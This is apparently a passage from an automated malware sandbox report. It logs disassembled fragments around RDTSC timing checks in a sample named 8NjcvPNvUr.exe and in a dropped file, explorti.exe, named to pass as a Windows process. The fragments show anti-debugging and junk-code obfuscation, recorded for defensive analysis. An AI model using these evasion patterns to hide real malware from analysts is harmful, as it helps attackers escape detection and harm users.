Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80D94 second address: 4C80D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DAE second address: 4C80DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DB2 second address: 4C80DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DB8 second address: 4C80DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DDC second address: 4C80DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DF7 second address: 4C80DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80DFD second address: 4C80E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FD180B5C15Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C80E19 second address: 4C80E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30660 second address: 4C30666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30666 second address: 4C30686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED554h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30686 second address: 4C306CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FD180B5C159h 0x0000000e pushad 0x0000000f mov ecx, 75AAF68Bh 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C160h 0x0000001a sub eax, 273A9698h 0x00000020 jmp 00007FD180B5C15Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306CF second address: 4C306D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306D3 second address: 4C306D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306D9 second address: 4C306DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C306DE second address: 4C3070F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FD180B5C162h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD180B5C15Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C3070F second address: 4C30721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED54Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30721 second address: 4C3078F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FD180B5C169h 0x00000014 pop eax 0x00000015 jmp 00007FD180B5C15Eh 0x0000001a push 41C039FBh 0x0000001f pushad 0x00000020 mov dl, BBh 0x00000022 mov di, si 0x00000025 popad 0x00000026 xor dword ptr [esp], 373097FBh 0x0000002d jmp 00007FD180B5C162h 0x00000032 mov eax, dword ptr fs:[00000000h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C3078F second address: 4C307AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C307AC second address: 4C307BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C15Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C307BC second address: 4C30888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov bh, A4h 0x00000010 pop eax 0x00000011 movsx edx, si 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007FD1807ED54Fh 0x0000001b nop 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD1807ED554h 0x00000023 sbb esi, 0BB028C8h 0x00000029 jmp 00007FD1807ED54Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 jmp 00007FD1807ED54Fh 0x00000035 pop eax 0x00000036 popad 0x00000037 sub esp, 1Ch 0x0000003a jmp 00007FD1807ED54Fh 0x0000003f xchg eax, ebx 0x00000040 jmp 00007FD1807ED556h 0x00000045 push eax 0x00000046 jmp 00007FD1807ED54Bh 0x0000004b xchg eax, ebx 0x0000004c jmp 00007FD1807ED556h 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD1807ED557h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30888 second address: 4C30918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD180B5C15Fh 0x00000008 pop eax 0x00000009 mov bx, 048Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FD180B5C162h 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD180B5C15Eh 0x0000001e add ch, FFFFFFD8h 0x00000021 jmp 00007FD180B5C15Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007FD180B5C168h 0x0000002d sub cx, C238h 0x00000032 jmp 00007FD180B5C15Bh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FD180B5C165h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30918 second address: 4C3098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 jmp 00007FD1807ED553h 0x00000018 popfd 0x00000019 jmp 00007FD1807ED558h 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 jmp 00007FD1807ED550h 0x00000025 mov eax, dword ptr [76FBB370h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD1807ED557h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C3098D second address: 4C309BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD180B5C15Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C309BC second address: 4C309C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C309C2 second address: 4C309C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C309C6 second address: 4C30A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ebx, ecx 0x0000000f popad 0x00000010 nop 0x00000011 jmp 00007FD1807ED558h 0x00000016 push eax 0x00000017 jmp 00007FD1807ED54Bh 0x0000001c nop 0x0000001d jmp 00007FD1807ED556h 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 pushad 0x00000026 movzx esi, dx 0x00000029 jmp 00007FD1807ED553h 0x0000002e popad 0x0000002f mov dword ptr fs:[00000000h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A39 second address: 4C30A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A54 second address: 4C30A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FD1807ED54Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED54Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A93 second address: 4C30A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30A99 second address: 4C30ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov esi, 121E68CDh 0x00000011 jmp 00007FD1807ED54Ah 0x00000016 popad 0x00000017 jne 00007FD1F2A7C7ACh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD1807ED557h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30ADD second address: 4C30AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30AE3 second address: 4C30B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 mov dword ptr [ebp-20h], eax 0x00000018 jmp 00007FD1807ED558h 0x0000001d mov ebx, dword ptr [esi] 0x0000001f jmp 00007FD1807ED550h 0x00000024 mov dword ptr [ebp-24h], ebx 0x00000027 jmp 00007FD1807ED550h 0x0000002c test ebx, ebx 0x0000002e jmp 00007FD1807ED550h 0x00000033 je 00007FD1F2A7C673h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30B5C second address: 4C30B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30B60 second address: 4C30B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30B66 second address: 4C30BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp ebx, FFFFFFFFh 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD180B5C15Eh 0x00000013 or ecx, 4C458CF8h 0x00000019 jmp 00007FD180B5C15Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C300CF second address: 4C300D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C300D5 second address: 4C3010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD180B5C166h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD180B5C15Ah 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503940 second address: 503944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503A9C second address: 503AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503AA2 second address: 503AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503AA8 second address: 503ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD180B5C166h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503ACB second address: 503AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F03 second address: 503F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F07 second address: 503F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F10 second address: 503F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C162h 0x00000009 jnl 00007FD180B5C156h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD180B5C162h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 503F43 second address: 503F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FD1807ED546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50651C second address: 50658B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov si, dx 0x0000000f push 00000000h 0x00000011 and ch, 0000003Bh 0x00000014 push 943A65A8h 0x00000019 pushad 0x0000001a push ebx 0x0000001b jl 00007FD180B5C156h 0x00000021 pop ebx 0x00000022 push edx 0x00000023 jmp 00007FD180B5C164h 0x00000028 pop edx 0x00000029 popad 0x0000002a add dword ptr [esp], 6BC59AD8h 0x00000031 sub esi, 5594CB6Dh 0x00000037 push 00000003h 0x00000039 add dh, 0000000Dh 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D2CC3h] 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 cmc 0x00000048 mov ebx, dword ptr [ebp+122D2997h] 0x0000004e popad 0x0000004f push 499A4006h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50670F second address: 506713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506713 second address: 506736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD180B5C169h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506736 second address: 506759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506759 second address: 50675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50675D second address: 506761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506761 second address: 5067B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD180B5C163h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FD180B5C162h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2C93h] 0x0000001e lea ebx, dword ptr [ebp+1245B3C8h] 0x00000024 jg 00007FD180B5C15Ch 0x0000002a push eax 0x0000002b push ebx 0x0000002c jnc 00007FD180B5C15Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506826 second address: 5068AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FD1807ED557h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD1807ED54Dh 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 call 00007FD1807ED54Fh 0x0000001e mov ecx, dword ptr [ebp+122D2A17h] 0x00000024 pop edi 0x00000025 mov esi, eax 0x00000027 popad 0x00000028 push 00000000h 0x0000002a mov ecx, eax 0x0000002c mov edx, dword ptr [ebp+122D2C5Fh] 0x00000032 call 00007FD1807ED549h 0x00000037 jmp 00007FD1807ED54Dh 0x0000003c push eax 0x0000003d jmp 00007FD1807ED54Eh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FD1807ED550h 0x0000004b mov eax, dword ptr [eax] 0x0000004d push eax 0x0000004e push edx 0x0000004f jnc 00007FD1807ED548h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5068AF second address: 5068BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5068BA second address: 50694D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FD1807ED550h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FD1807ED548h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FD1807ED548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 pushad 0x00000049 mov edi, dword ptr [ebp+122D33EDh] 0x0000004f or dword ptr [ebp+122D3543h], edi 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+122D2CCFh] 0x0000005c push 00000000h 0x0000005e or ecx, dword ptr [ebp+122D322Ch] 0x00000064 push 00000003h 0x00000066 jmp 00007FD1807ED551h 0x0000006b push B5C169CDh 0x00000070 push eax 0x00000071 push edx 0x00000072 push ecx 0x00000073 push ebx 0x00000074 pop ebx 0x00000075 pop ecx 0x00000076 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 50694D second address: 506953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506953 second address: 506957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 506957 second address: 5069B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 75C169CDh 0x00000012 call 00007FD180B5C15Bh 0x00000017 mov dl, bh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245B3D3h] 0x00000020 jng 00007FD180B5C15Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD180B5C168h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5069B7 second address: 5069BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5069BD second address: 5069D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD180B5C15Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jl 00007FD180B5C156h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 527B79 second address: 527B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 527B84 second address: 527B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD180B5C156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5263BB second address: 5263D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 5263D1 second address: 5263D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 526534 second address: 52653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 52681F second address: 526825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 52697A second address: 526984 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc

